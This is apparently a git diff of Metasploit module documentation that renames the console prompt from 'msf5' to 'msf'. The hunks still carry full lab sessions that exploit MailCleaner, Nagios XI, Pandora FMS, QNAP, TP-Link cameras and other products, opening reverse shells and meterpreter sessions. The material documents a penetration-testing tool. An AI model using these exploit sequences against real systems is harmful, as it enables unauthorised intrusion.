@@ -51,18 +51,18 @@ meterpreter > You can also use cmd payloads. ``` -msf5 > use exploit/linux/http/mailcleaner_exec -msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 +msf > use exploit/linux/http/mailcleaner_exec +msf exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100 RHOSTS => 12.0.0.100 -msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 +msf exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin +msf exploit(linux/http/mailcleaner_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD -msf5 exploit(linux/http/mailcleaner_exec) > set target 1 -msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse +msf exploit(linux/http/mailcleaner_exec) > set PASSWORD +msf exploit(linux/http/mailcleaner_exec) > set target 1 +msf exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse -msf5 exploit(linux/http/mailcleaner_exec) > run +msf exploit(linux/http/mailcleaner_exec) > run [*] Started reverse TCP double handler on 12.0.0.1:4444 [*] Performing authentication... diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md index e5b3ae3131..8d98e8603e 100644 --- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md +++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md 
@@ -90,12 +90,12 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > use exploit/linux/http/microfocus_secure_messaging_gateway -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25 +msf > use exploit/linux/http/microfocus_secure_messaging_gateway +msf exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25 RHOSTS => 12.0.0.25 -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1 +msf exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run +msf exploit(linux/http/microfocus_secure_messaging_gateway) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Creating an user with appropriate privileges diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md index 894e3a2ce1..2c8fdf524a 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.md @@ -26,10 +26,10 @@ ### Nagios 5.2.7 on CentOS 6.7 ``` -msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo -msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182 +msf > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo +msf exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182 rhost => 172.22.222.182 -msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run +msf exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run [*] Started reverse TCP handler on 172.22.222.177:4444 [*] Command Stager progress - 100.00% done (705/705 bytes) 
diff --git a/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md b/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md index 9b6ceb04e4..3893d12ddc 100644 --- a/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md +++ b/documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md @@ -41,8 +41,8 @@ This executes a Python payload. ### Netsweeper 6.4.3 ISO, based on CentOS Linux ``` -msf5 > use exploit/linux/http/netsweeper_webadmin_unixlogin -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > options +msf > use exploit/linux/http/netsweeper_webadmin_unixlogin +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > options Module options (exploit/linux/http/netsweeper_webadmin_unixlogin): @@ -72,11 +72,11 @@ Exploit target: 0 Python -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157 rhosts => 172.16.249.157 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > run [*] Started HTTPS reverse handler on https://172.16.249.1:8443 [*] Executing automatic check (disable AutoCheck to override) @@ -101,9 +101,9 @@ meterpreter > ### Netsweeper 6.4.4 ISO, based on CentOS Linux ``` -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160 +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160 rhosts => 172.16.249.160 -msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run +msf exploit(linux/http/netsweeper_webadmin_unixlogin) > run [*] Started HTTPS reverse handler on https://172.16.249.1:8443 [*] Executing automatic check (disable AutoCheck to override) 
diff --git a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md index f4973aa476..1afa4fee2d 100644 --- a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md +++ b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md @@ -83,8 +83,8 @@ password is randomized on install. ### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3) ``` -msf5 > use exploit/linux/http/nexus_repo_manager_el_injection -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options +msf > use exploit/linux/http/nexus_repo_manager_el_injection +msf exploit(linux/http/nexus_repo_manager_el_injection) > options Module options (exploit/linux/http/nexus_repo_manager_el_injection): @@ -119,13 +119,13 @@ Exploit target: 0 Nexus Repository Manager <= 3.21.1 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1 +msf exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set password admin +msf exploit(linux/http/nexus_repo_manager_el_injection) > set password admin password => admin -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3 +msf exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run +msf exploit(linux/http/nexus_repo_manager_el_injection) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md b/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md index b46447ac4a..1880695925 100644 --- a/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md 
+++ b/documentation/modules/exploit/linux/http/pandora_fms_events_exec.md @@ -49,7 +49,7 @@ The username for the Pandora FMS account to authenticate with. This option is re ## Scenarios ### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (x64) ``` -msf5 exploit(linux/http/pandora_fms_events_exec) > show options +msf exploit(linux/http/pandora_fms_events_exec) > show options Module options (exploit/linux/http/pandora_fms_events_exec): @@ -84,7 +84,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(linux/http/pandora_fms_events_exec) > exploit +msf exploit(linux/http/pandora_fms_events_exec) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Authenticated as user admin. @@ -101,7 +101,7 @@ meterpreter > ``` ### Pandora FMS 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version). Target: Linux (cmd) ``` -msf5 exploit(linux/http/pandora_fms_events_exec) > exploit +msf exploit(linux/http/pandora_fms_events_exec) > exploit [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Authenticated as user admin. diff --git a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md index fa926e8443..4d0e564ce6 100644 --- a/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pandora_ping_cmd_exec.md 
@@ -44,18 +44,18 @@ https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing Tested Pandora FMS 7.0 NG on CentOS 7.3.1611 ``` -msf5 > use exploit/linux/http/pandora_ping_cmd_exec -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128 +msf > use exploit/linux/http/pandora_ping_cmd_exec +msf exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128 RHOSTS => 192.168.215.128 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12 +msf exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12 RHOSTS => 192.168.1.12 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5 +msf exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin +msf exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin USERNAME => admin -msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora +msf exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora PASSWORD => pandora -msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit +msf exploit(linux/http/pandora_ping_cmd_exec) > exploit [*] Started reverse TCP handler on 192.168.1.5:4444 [*] Exploiting... diff --git a/documentation/modules/exploit/linux/http/panos_readsessionvars.md b/documentation/modules/exploit/linux/http/panos_readsessionvars.md index a44a50cc1e..21b657746c 100644 --- a/documentation/modules/exploit/linux/http/panos_readsessionvars.md +++ b/documentation/modules/exploit/linux/http/panos_readsessionvars.md @@ -32,7 +32,7 @@ This VM is not generally available, but the specific disk image used was `PA-VM- ## Scenarios ``` -msf5 exploit(linux/http/panos_readsessionvars) > exploit +msf exploit(linux/http/panos_readsessionvars) > exploit [*] Started reverse TCP handler on 192.168.122.1:4444 [*] Creating our corrupted session ID... 
diff --git a/documentation/modules/exploit/linux/http/php_imap_open_rce.md b/documentation/modules/exploit/linux/http/php_imap_open_rce.md index 972090ab16..2115155f74 100644 --- a/documentation/modules/exploit/linux/http/php_imap_open_rce.md +++ b/documentation/modules/exploit/linux/http/php_imap_open_rce.md @@ -430,14 +430,14 @@ Make sure `php-imap` is installed and enabled. Create `imap.php` with the follo Using the `imap.php` page listed above. ``` - msf5 > use exploit/linux/http/php_imap_open_rce - msf5 exploit(linux/http/php_imap_open_rce) > set target 3 + msf > use exploit/linux/http/php_imap_open_rce + msf exploit(linux/http/php_imap_open_rce) > set target 3 target => 3 - msf5 exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1 + msf exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1 lhost => 1.1.1.1 - msf5 exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2 + msf exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2 rhost => 2.2.2.2 - msf5 exploit(linux/http/php_imap_open_rce) > exploit + msf exploit(linux/http/php_imap_open_rce) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Listener started for 300 seconds diff --git a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md index a8a7d668f0..9cede0e79f 100644 --- a/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md +++ b/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md 
@@ -29,9 +29,9 @@ the `auxiliary/gather/pulse_secure_file_disclosure` module. ## Usage ``` -msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 +msf exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 sid => 676f5f892e8c4a6419f10564f9e9d857 -msf5 exploit(linux/http/pulse_secure_cmd_exec) > run +msf exploit(linux/http/pulse_secure_cmd_exec) > run [*] Started reverse TCP handler on 127.0.0.1:[redacted] [+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 diff --git a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md index 792f3c5685..7fa2b780b7 100644 --- a/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md +++ b/documentation/modules/exploit/linux/http/qnap_qcenter_change_passwd_exec.md @@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/linux/http/qnap_qcenter_change_passwd_exec - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > set rhosts 10.1.1.112 + msf > use exploit/linux/http/qnap_qcenter_change_passwd_exec + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > set rhosts 10.1.1.112 rhosts => 10.1.1.112 - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > set verbose true + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > set verbose true verbose => true - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > check + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > check [*] Target is QNAP Q'Center appliance version 1.6.1075 [*] 10.1.1.112:443 The target appears to be vulnerable. - msf5 exploit(linux/http/qnap_qcenter_change_passwd_exec) > run + msf exploit(linux/http/qnap_qcenter_change_passwd_exec) > run [*] Started reverse TCP handler on 10.1.1.197:4444 [*] Target is QNAP Q'Center appliance version 1.6.1075 
diff --git a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md index 8e5c102b50..8bce99a98f 100644 --- a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md +++ b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md @@ -22,7 +22,7 @@ Tips : once you get a shell, look at the CVE-2019-19585. You will probably get r ## Scenarios ``` -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options Module options (exploit/linux/http/rconfig_ajaxarchivefiles_rce): @@ -50,12 +50,12 @@ Exploit target: -- ---- 0 Auto -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1 RHOSTS => 1.1.1.1 -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2 LHOST => 1.1.1.2 -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] rConfig version 3.9 detected [+] New temporary user 6QpO8mLt created [+] Authenticated as user 6QpO8mLt @@ -63,7 +63,7 @@ msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] Command successfully executed [*] User 6QpO8mLt removed successfully ! -msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1 +msf exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1 [*] Starting interaction with 1... id uid=48(apache) gid=48(apache) groups=48(apache) diff --git a/documentation/modules/exploit/linux/http/spark_unauth_rce.md b/documentation/modules/exploit/linux/http/spark_unauth_rce.md index 19e832554a..fa79ed2d2b 100644 --- a/documentation/modules/exploit/linux/http/spark_unauth_rce.md +++ b/documentation/modules/exploit/linux/http/spark_unauth_rce.md 
@@ -27,32 +27,32 @@ https://github.com/vulhub/vulhub/tree/master/spark/unacc ### Spark 2.3.1 ``` -msf5 > use exploit/linux/http/spark_unauth_rce -msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1 +msf > use exploit/linux/http/spark_unauth_rce +msf exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066 +msf exploit(linux/http/spark_unauth_rce) > set rport 6066 rport => 6066 -msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167 +msf exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167 srvhost => 10.139.14.167 -msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999 +msf exploit(linux/http/spark_unauth_rce) > set srvport 9999 srvport => 9999 -msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp +msf exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp -msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167 +msf exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167 lhost => 10.139.14.167 -msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555 +msf exploit(linux/http/spark_unauth_rce) > set lport 5555 lport => 5555 -msf5 exploit(linux/http/spark_unauth_rce) > exploit +msf exploit(linux/http/spark_unauth_rce) > exploit [*] Exploit running as background job 3. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.139.14.167:5555 -msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ... +msf exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ... [*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI [*] 127.0.0.1:6066 - Sending the payload to the server... 
[*] Sending stage (53867 bytes) to 10.139.14.167 [*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800 -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions Active sessions =============== @@ -61,7 +61,7 @@ Active sessions -- ---- ---- ----------- ---------- 2 meterpreter java/linux root @ 96b2135aee9c 10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1) -msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2 +msf exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid diff --git a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md index 893a2492b7..8335f9ba67 100644 --- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md +++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md @@ -171,7 +171,7 @@ Wfsdelay needs to be at least a couple seconds to allow for payload download and This unit's version was not able to be determined automatically. `forceexploit` was set to `true` to enable it to run. ``` -msf5 exploit(linux/http/synology_dsm_smart_exec_auth) > run +msf exploit(linux/http/synology_dsm_smart_exec_auth) > run [*] Started reverse TCP handler on 192.168.135.168:4567 [*] Trying to detect installed version diff --git a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md index 03f2aedf90..6a82e98a60 100644 --- a/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md +++ b/documentation/modules/exploit/linux/http/tp_link_ncxxx_bonjour_command_injection.md 
@@ -62,25 +62,25 @@ The web interface password for the specified username Target = 0 (TP-Link NC200, NC220, NC230, NC250) ``` -msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection +msf > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection [*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 rhost => 192.168.0.1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80 rport => 80 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0 target => 0 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin username => admin -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password password => password -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp payload => linux/mipsle/shell/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 lhost => 192.168.0.254 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 lport => 5555 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > 
exploit +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.254:6666 [*] Authenticating with admin:YWRtaW4= ... 
@@ -102,25 +102,25 @@ msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit Target = 1 (TP-Link NC260, NC450) ``` -msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection +msf > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection [*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1 rhost => 192.168.0.1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443 rport => 443 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1 target => 1 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin username => admin -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password password => password -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp payload => linux/mipsle/shell/reverse_tcp -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254 lhost => 192.168.0.254 -msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555 lport => 5555 -msf5 
exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit +msf exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit [*] Started reverse TCP handler on 192.168.0.254:5555 [*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ... diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md index f277aed746..be1ba4a332 100644 --- a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md +++ b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md @@ -72,19 +72,19 @@ contain any special characters. ### Trend Micro Web Security 6.5-SP2_Build_Linux_1852 ``` -msf5 > use exploit/linux/http/trendmicro_websecurity_exec -msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31 +msf > use exploit/linux/http/trendmicro_websecurity_exec +msf exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31 RHOSTS => 192.168.74.31 -msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186 +msf exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.31.224.186 LHOST => 172.31.224.186 -msf5 exploit(linux/http/trendmicro_websecurity_exec) > check +msf exploit(linux/http/trendmicro_websecurity_exec) > check [*] Trying to extract session ID by exploiting reverse proxy service [+] Extracted number of JSESSIONID : 16 [*] Testing JSESSIONID #0 : 132B2651F070E865A646F3ABA681769A [+] Awesome !!! JESSIONID #0 is active. [+] 192.168.74.31:8443 - The target is vulnerable. -msf5 exploit(linux/http/trendmicro_websecurity_exec) > run +msf exploit(linux/http/trendmicro_websecurity_exec) > run [*] Started reverse TCP handler on 172.31.224.186:4444 [*] Trying to extract session ID by exploiting reverse proxy service 
diff --git a/documentation/modules/exploit/linux/http/ueb_api_rce.md b/documentation/modules/exploit/linux/http/ueb_api_rce.md index 7ffdcbd305..4c625675b4 100644 --- a/documentation/modules/exploit/linux/http/ueb_api_rce.md +++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md @@ -22,14 +22,14 @@ This exploit has two targets: ### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit ``` -msf5 > use exploit/linux/http/ueb_api_rce -msf5 exploit(linux/http/ueb_api_rce) > set target 0 +msf > use exploit/linux/http/ueb_api_rce +msf exploit(linux/http/ueb_api_rce) > set target 0 target => 0 -msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +msf exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 rhost => 1.1.1.1 -msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +msf exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 lhost => 2.2.2.2 -msf5 exploit(linux/http/ueb_api_rce) > exploit +msf exploit(linux/http/ueb_api_rce) > exploit [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:443 - Sending requests to UEB... @@ -56,14 +56,14 @@ Server username: uid=0, gid=0, euid=0, egid=0 ### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit ``` -msf5 > use exploit/linux/http/ueb_api_rce -msf5 exploit(linux/http/ueb_api_rce) > set target 1 +msf > use exploit/linux/http/ueb_api_rce +msf exploit(linux/http/ueb_api_rce) > set target 1 target => 1 -msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 +msf exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1 rhost => 1.1.1.1 -msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 +msf exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2 lhost => 2.2.2.2 -msf5 exploit(linux/http/ueb_api_rce) > exploit +msf exploit(linux/http/ueb_api_rce) > exploit [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:443 - Sending requests to UEB... 
diff --git a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md index 6993e9a4ae..a2d6f1b60b 100644 --- a/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/http/unraid_auth_bypass_exec.md @@ -30,12 +30,12 @@ according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getti ## Scenarios ``` -msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb -msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173 +msf > use exploit/linux/http/unraid_auth_bypass_exec.rb +msf exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173 RHOSTS => 10.10.0.173 -msf5 exploit(linux/http/unraid_auth_bypass_exec) > check +msf exploit(linux/http/unraid_auth_bypass_exec) > check [*] 10.10.0.173:80 - The target appears to be vulnerable. -msf5 exploit(linux/http/unraid_auth_bypass_exec) > run +msf exploit(linux/http/unraid_auth_bypass_exec) > run [*] Started reverse TCP handler on 10.10.0.161:4444 [*] Sending stage (38288 bytes) to 10.10.0.173 diff --git a/documentation/modules/exploit/linux/http/vestacp_exec.md b/documentation/modules/exploit/linux/http/vestacp_exec.md index 00ddc890d3..596ea42e94 100644 --- a/documentation/modules/exploit/linux/http/vestacp_exec.md +++ b/documentation/modules/exploit/linux/http/vestacp_exec.md 
